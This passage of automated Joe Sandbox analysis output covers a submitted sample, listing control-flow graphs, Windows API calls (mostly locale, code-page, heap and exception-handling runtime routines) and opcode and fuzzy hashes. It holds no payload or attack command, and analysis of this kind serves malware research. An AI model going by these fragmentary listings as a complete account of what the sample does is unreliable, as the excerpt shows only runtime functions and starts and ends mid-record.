167->168 169 dd8fc6-dd8fc7 167->169 170 dd8fc8-dd8fda call dd952a 168->170 169->170 170->150 173 dd8fdc-dd8fe2 call dc6c84 170->173 173->147
                                                            APIs
                                                            • __freea.LIBCMT ref: 00DD8FDD
                                                              • Part of subcall function 00DD3A83: HeapAlloc.KERNEL32(00000000,00DDA1AA,?,?,00DDA1AA,00000220,?,?,?), ref: 00DD3AB5
                                                            • __freea.LIBCMT ref: 00DD8FF2
                                                            • __freea.LIBCMT ref: 00DD9002
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __freea$AllocHeap
                                                            • String ID:
                                                            • API String ID: 85559729-0
                                                            • Opcode ID: af8cef6d3c6a27e0205cbee9028abb65b49bde2c0e983756f4a1662dca34bcd8
                                                            • Instruction ID: 8f1d0a8d7741c9c68bf24d2470be444451da512bb0b7ab36fc58dc8237d89a94
                                                            • Opcode Fuzzy Hash: af8cef6d3c6a27e0205cbee9028abb65b49bde2c0e983756f4a1662dca34bcd8
                                                            • Instruction Fuzzy Hash: 89518372600216AFEB225FA4CC41EBB7BAAEF44750B19052AFD08D6350EF31CD54A770

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 176 dda3a6-dda3ce call dd9ed6 179 dda3d4-dda3da 176->179 180 dda596-dda597 call dd9f47 176->180 182 dda3dd-dda3e3 179->182 183 dda59c-dda59e 180->183 184 dda3e9-dda3f5 182->184 185 dda4e5-dda504 call dc8240 182->185 187 dda59f-dda5ad call dc6ca2 183->187 184->182 188 dda3f7-dda3fd 184->188 193 dda507-dda50c 185->193 191 dda4dd-dda4e0 188->191 192 dda403-dda40f IsValidCodePage 188->192 191->187 192->191 195 dda415-dda41c 192->195 198 dda50e-dda513 193->198 199 dda549-dda553 193->199 196 dda41e-dda42a 195->196 197 dda444-dda451 GetCPInfo 195->197 200 dda42e-dda43a call dd9faa 196->200 202 dda4d1-dda4d7 197->202 203 dda453-dda472 call dc8240 197->203 204 dda515-dda51d 198->204 205 dda546 198->205 199->193 201 dda555-dda57f call dd9e98 199->201 211 dda43f 200->211 215 dda580-dda58f 201->215 202->180 202->191 203->200 216 dda474-dda47b 203->216 209 dda51f-dda522 204->209 210 dda53e-dda544 204->210 205->199 214 dda524-dda52a 209->214 210->198 210->205 211->183 214->210 217 dda52c-dda53c 214->217 215->215 218 dda591 215->218 219 dda47d-dda482 216->219 220 dda4a7-dda4aa 216->220 217->210 217->214 218->180 219->220 221 dda484-dda48c 219->221 222 dda4af-dda4b6 220->222 224 dda49f-dda4a5 221->224 225 dda48e-dda495 221->225 222->222 223 dda4b8-dda4cc call dd9e98 222->223 223->200 224->219 224->220 227 dda496-dda49d 225->227 227->224 227->227
                                                            APIs
                                                              • Part of subcall function 00DD9ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00DD9F01
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00DDA1ED,?,00000000,?,?,?), ref: 00DDA407
                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDA1ED,?,00000000,?,?,?), ref: 00DDA449
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 93cc7004bddc39f188d19a48ac52c6e0885d95fb534243614d8dad2d3704e463
                                                            • Instruction ID: 4f7a583f1eb2b47e7dffdb3fc6f2c19954b54307cde773bc28622d32fd162068
                                                            • Opcode Fuzzy Hash: 93cc7004bddc39f188d19a48ac52c6e0885d95fb534243614d8dad2d3704e463
                                                            • Instruction Fuzzy Hash: 2A512271A002859FDB20DF79C884AAAFBF5EF81304F18846FD0868B351E6B5D945CB72

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 229 dd6368-dd6377 call dd5f14 232 dd6379-dd639e LCMapStringEx 229->232 233 dd63a0-dd63ba call dd63c5 LCMapStringW 229->233 237 dd63c0-dd63c2 232->237 233->237
                                                            APIs
                                                            • LCMapStringEx.KERNELBASE(?,00DD8F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00DD639C
                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00DD8F1C,?,?,00000000,?,00000000), ref: 00DD63BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String
                                                            • String ID:
                                                            • API String ID: 2568140703-0
                                                            • Opcode ID: c3c1653702c43c9bbc9f7f63a2b73b170491d48ab858d5ec63c336b796549ea4
                                                            • Instruction ID: 5ce91c2bccd66c5dfa019be91accafa4ecf74de76e5c3ccbdc2b217615c1576d
                                                            • Opcode Fuzzy Hash: c3c1653702c43c9bbc9f7f63a2b73b170491d48ab858d5ec63c336b796549ea4
                                                            • Instruction Fuzzy Hash: 1FF04D3240025ABBCF126F90DC09DEE3F66EF48764F098115FA186A230C736D975EBA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 238 dd9faa-dd9fcc 239 dda0e5-dda10b 238->239 240 dd9fd2-dd9fe4 GetCPInfo 238->240 241 dda110-dda115 239->241 240->239 242 dd9fea-dd9ff1 240->242 243 dda11f-dda125 241->243 244 dda117-dda11d 241->244 245 dd9ff3-dd9ffd 242->245 247 dda127-dda12a 243->247 248 dda131 243->248 246 dda12d-dda12f 244->246 245->245 249 dd9fff-dda012 245->249 251 dda133-dda145 246->251 247->246 248->251 250 dda033-dda035 249->250 252 dda014-dda01b 250->252 253 dda037-dda06e call dd8d25 call dd901c 250->253 251->241 254 dda147-dda155 call dc6ca2 251->254 255 dda02a-dda02c 252->255 264 dda073-dda0a8 call dd901c 253->264 258 dda01d-dda01f 255->258 259 dda02e-dda031 255->259 258->259 262 dda021-dda029 258->262 259->250 262->255 267 dda0aa-dda0b4 264->267 268 dda0b6-dda0c0 267->268 269 dda0c2-dda0c4 267->269 272 dda0d4-dda0e1 268->272 270 dda0c6-dda0d0 269->270 271 dda0d2 269->271 270->272 271->272 272->267 273 dda0e3 272->273 273->254
                                                            APIs
                                                            • GetCPInfo.KERNEL32(E8458D00,?,00DDA1F9,00DDA1ED,00000000), ref: 00DD9FDC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-0
                                                            • Opcode ID: 90c937e47fcc1ded079897bbfd101fa4e95d3755af417e4e5c58d4a4a8e4f168
                                                            • Instruction ID: 2a15e75542c585256e7cfb6a5057e7a394c50c1b30a7e307c5a8cd9e7a5a4349
                                                            • Opcode Fuzzy Hash: 90c937e47fcc1ded079897bbfd101fa4e95d3755af417e4e5c58d4a4a8e4f168
                                                            • Instruction Fuzzy Hash: 385159719042589ADB218E2CCD80FF67BB8EB45304F2445EEE19AC7286C275AD46DB31
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 5870bacb501339821e66612c2e938afd028faafdd217be7c49bf635b2594babf
                                                            • Instruction ID: dd9a05b1b57319e7d360c5b23f25459cf4a74c3bdf390167acf96063a5b4cd17
                                                            • Opcode Fuzzy Hash: 5870bacb501339821e66612c2e938afd028faafdd217be7c49bf635b2594babf
                                                            • Instruction Fuzzy Hash: 17D22771E082298FDF65DE28DD407EAB7B6EB84305F1841EAD44DE7240E774AE818F61
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00DDCB32,00000002,00000000,?,?,?,00DDCB32,?,00000000), ref: 00DDC8AD
                                                            • GetLocaleInfoW.KERNEL32(?,20001004,00DDCB32,00000002,00000000,?,?,?,00DDCB32,?,00000000), ref: 00DDC8D6
                                                            • GetACP.KERNEL32(?,?,00DDCB32,?,00000000), ref: 00DDC8EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: ACP$OCP
                                                            • API String ID: 2299586839-711371036
                                                            • Opcode ID: fce36369ab361fe1bbf29ca39567a7da66b8a33c30ad34208eeda245e24d39b4
                                                            • Instruction ID: e8ff96fbad5d8dcc89d7b78c836bbd51c76d0c7c1976b7000cb48804731d078e
                                                            • Opcode Fuzzy Hash: fce36369ab361fe1bbf29ca39567a7da66b8a33c30ad34208eeda245e24d39b4
                                                            • Instruction Fuzzy Hash: 7E21A432A20203E6DB249F55C941E9777A6BF54F50F5A9426E909DB300EB32DD40E370
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00DDCAF5
                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00DDCB3E
                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00DDCB4D
                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00DDCB95
                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00DDCBB4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                            • String ID:
                                                            • API String ID: 415426439-0
                                                            • Opcode ID: 2003dc154ee17037da2f40d4ffbd896a66d99a3faf05ec623c8cd57465a9c715
                                                            • Instruction ID: fd886f039e2cf51f74d9bb374f0695819ea0e2aa4b10e4176360c32f297ea8a1
                                                            • Opcode Fuzzy Hash: 2003dc154ee17037da2f40d4ffbd896a66d99a3faf05ec623c8cd57465a9c715
                                                            • Instruction Fuzzy Hash: 96516F71A1020AABDB10EFA5CC45ABA77B8FF09700F19546BE911EB390E770DA05CB71
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • GetACP.KERNEL32(?,?,?,?,?,?,00DD1848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00DDC146
                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00DD1848,?,?,?,00000055,?,-00000050,?,?), ref: 00DDC171
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00DDC2D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                            • String ID: utf8
                                                            • API String ID: 607553120-905460609
                                                            • Opcode ID: ca9ec06cdab6470dd7eaa86bcb84dc4f9546127c044b0cc1cc93593573018888
                                                            • Instruction ID: 55ed5dcc7470255a48508ff12da61942fdae37adfa6226384fc3519a8682e51e
                                                            • Opcode Fuzzy Hash: ca9ec06cdab6470dd7eaa86bcb84dc4f9546127c044b0cc1cc93593573018888
                                                            • Instruction Fuzzy Hash: 1E71D231A60313AADB24BBB5CC46BBAB7A8EF44750F18502BF505D7381EA70E941C7B4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strrchr
                                                            • String ID:
                                                            • API String ID: 3213747228-0
                                                            • Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
                                                            • Instruction ID: 18ad254feef66a3778793fca10e54efd7caa74d84bcaff0e2f811d831fec6c66
                                                            • Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
                                                            • Instruction Fuzzy Hash: EDB15A72E042499FDB158F68C881BEEBBB5EF55310F18416BE945AB381D234DE05CBB2
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00DC792E
                                                            • IsDebuggerPresent.KERNEL32 ref: 00DC79FA
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DC7A13
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00DC7A1D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 1bf440c3fd97e4b3415a0ed6da7a67fa5a789f8d6400fed42944e436a86e079d
                                                            • Instruction ID: bf927323f474e81cea268c467b934f19f1b224b2e62e4ae2f9fa15fabdbd74ec
                                                            • Opcode Fuzzy Hash: 1bf440c3fd97e4b3415a0ed6da7a67fa5a789f8d6400fed42944e436a86e079d
                                                            • Instruction Fuzzy Hash: B931FB75D053199BDB21EF64D989BCDBBB8AF08300F1041DAE40CAB250EB709B858F55
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC4EC
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC536
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC5FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale$ErrorLast
                                                            • String ID:
                                                            • API String ID: 661929714-0
                                                            • Opcode ID: f1f480bcd9961dac8efce19fd8a3a6ad50a5eec3d54c3f370378c296914e5f76
                                                            • Instruction ID: d4d8560d70c9a87f61809bc8b6c5e4757c0a0cda12d5387c98575590a062e1a2
                                                            • Opcode Fuzzy Hash: f1f480bcd9961dac8efce19fd8a3a6ad50a5eec3d54c3f370378c296914e5f76
                                                            • Instruction Fuzzy Hash: C26190725202079BDB289F24DD82BBAB7A8EF04310F14617BE905C6399EB74E941CB70
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00DCDB6B
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DCDB75
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00DCDB82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: adc392502a83249844ed643e3ba09d377085f55feb74bab0b64579c9a8edf7e3
                                                            • Instruction ID: f086a12cc7d6b8c44eee8d8ad7513e90436ed5e3a7d4150a43b6480e3177fe02
                                                            • Opcode Fuzzy Hash: adc392502a83249844ed643e3ba09d377085f55feb74bab0b64579c9a8edf7e3
                                                            • Instruction Fuzzy Hash: 0331C474901329ABCB21DF64DD89B9CBBB9BF08310F5041EAE41CA7250EB749F858F64
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
                                                            • Instruction ID: 9d3cc253c2608683694bcad5be4c9077ec6f38f6450a1c3d17c0b6d58bf8fa06
                                                            • Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
                                                            • Instruction Fuzzy Hash: 38F13E71E012199FDF14CFA9C884BADBBB5FF88314F19826AE915A7341D7309D058BA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$UT
                                                            • API String ID: 0-1626504983
                                                            • Opcode ID: e0872cb26255705f7d48561bd0d36eae2ccbb937a8561f5ea2d9795a88105742
                                                            • Instruction ID: 11841f2df6b336a27c637ee09825719b6f6c7adc55b01236b6b7a545c7518c15
                                                            • Opcode Fuzzy Hash: e0872cb26255705f7d48561bd0d36eae2ccbb937a8561f5ea2d9795a88105742
                                                            • Instruction Fuzzy Hash: 4D028EB1A002688FDF25CF64C8807AEBBB5AF45304F1454EAD949BB287D6349EC4CF95
                                                            Strings
                                                            Memory Dump Source
